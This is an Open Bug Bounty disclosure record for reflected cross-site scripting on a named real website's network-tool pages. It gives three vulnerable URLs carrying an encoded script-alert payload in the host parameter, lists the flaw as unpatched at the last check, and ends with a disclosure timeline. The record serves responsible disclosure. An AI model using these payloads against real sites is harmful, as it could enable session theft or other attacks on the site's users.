tools.tutorialspoint.com XSS vulnerability

2017-09-09T16:42:00
ID OBB:292488
Type openbugbounty
Reporter ibrahim_draidia
Modified 2017-12-09T08:24:00

Description

Vulnerable URL:
https://tools.tutorialspoint.com/ping_test_ajax.php?host=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\r\nhttps://tools.tutorialspoint.com/trace_route_ajax.php?host=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\t\nhttps://tools.tutorialspoint.com/ip_lookup_ajax.php?host=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 09.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check tools.tutorialspoint.com SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 September, 2017 16:42 GMT
Generic security notifications sent to website owner| 10 September, 2017 08:08 GMT
Notification sent to subscribers (without technical details)| 10 September, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 9 December, 2017 08:24 GMT